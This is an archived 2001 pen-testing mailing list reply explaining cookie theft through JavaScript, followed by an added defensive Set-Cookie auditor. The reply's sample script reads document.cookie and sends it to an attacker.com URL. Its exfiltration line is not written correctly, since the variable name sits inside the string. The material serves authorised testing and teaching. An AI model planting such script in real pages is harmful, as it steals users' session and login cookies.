Re: Wanted: Script to email cookies

From: Jeremiah Grossman (jeremiahat_private)
Date: Sat Dec 01 2001 - 01:32:09 PST


    Well, of course there is the ever famous sniffer....
    that will see a cookie quite easily.... to move cookies
    off domains without the aid of a sniffer.... JavaScript has
    been known to be the most widely used method.
    
    something like
    
    <SCRIPT>
    var cookie_data = document.cookie;
    window.open('http://www.attacker.com/email_the_cookie.pl?cookie_value=cookie_data');
    </SCRIPT>
    
    
    Modify to suit your needs...
    
    The point is that you're using JavaScript to generate an off domain request
    method passing out the cookie data to a cgi.
    
    
    good. good.
    
    
    Jeremiah Grossman
    
    
    
    ----- Original Message -----
    From: "Joe Brown" <joe_brown@senet-int.com>
    To: <pen-testat_private>
    Sent: Friday, November 30, 2001 6:06 PM
    Subject: Wanted: Script to email cookies
    
    
    > I'm working on a pen test for a web application.  After
    > the first time you successfully authenticate, the app
    > stores a cookie with username and password in clear
    > text.  I've recently read the archive regarding
    > vulnerable IE browsers revealing cookies.  I'd like to
    > go a step farther.  Does anyone have a script that will
    > email the cookie?  I'd like to craft an email with a link
    > and when a user clicks, it emails the cookie.  I want
    > to show the client how dangerous it is to store a clear
    > text cookie.  Also, any other method of cookie stealing
    > would be really appreciated.  Thanks.
    >
    > Joe
    >
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    > Service. For more information on SecurityFocus' SIA service which
    > automatically alerts you to the latest security vulnerabilities please see:
    > https://alerts.securityfocus.com/
    >
    
    
    



    This archive was generated by hypermail 2b30 : Fri Nov 30 2001 - 14:20:41 PST
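
An added example, not part of the original thread: a small Set-Cookie auditor written from the defender's side. It flags cookies that script can read through document.cookie (what the snippet in the message relies on), cookies that travel unencrypted (the sniffer case), and cookies that appear to carry credentials (the application described in the quoted question). The header strings, function names and finding labels are constructed for illustration.

```javascript
// Constructed sample Set-Cookie header values (not taken from the thread).
const WEAK = 'login=user=jdoe&pass=Secret123; Path=/';
const HARDENED =
  'sid=9f2c4e7ab1d84c05a3e6f0b7c2d91e44; Path=/; Secure; HttpOnly; SameSite=Lax';

// Words that suggest a cookie name or value holds credentials rather than
// an opaque session identifier. Matched only when bounded by non-letters.
const CREDENTIAL_HINT =
  /(^|[^a-z])(user(name)?|login|pass(word|wd)?|pwd)([^a-z]|$)/i;

// Split one Set-Cookie header value into name, value and attribute flags.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const name = eq < 0 ? '' : pair.slice(0, eq);
  const value = eq < 0 ? pair : pair.slice(eq + 1);
  // Attribute names are case-insensitive; keep only the part before '='.
  const flags = new Set(
    attrs.filter(Boolean).map((a) => a.split('=')[0].trim().toLowerCase())
  );
  return { name, value, flags };
}

// Return the list of weaknesses found in one Set-Cookie header value.
function auditSetCookie(header) {
  const { name, value, flags } = parseSetCookie(header);
  const findings = [];
  // Without HttpOnly, any script running in the page sees it in document.cookie.
  if (!flags.has('httponly')) findings.push('script-readable');
  // Without Secure, the browser also sends it over plain HTTP.
  if (!flags.has('secure')) findings.push('sent-over-http');
  let decoded = value;
  try {
    decoded = decodeURIComponent(value); // catch percent-encoded contents too
  } catch (e) {
    // Malformed escape sequence: fall back to the raw value.
  }
  if (CREDENTIAL_HINT.test(name) || CREDENTIAL_HINT.test(decoded)) {
    findings.push('credential-like-content');
  }
  return { name, findings };
}

for (const h of [WEAK, HARDENED]) {
  console.log(JSON.stringify(auditSetCookie(h)));
}
```
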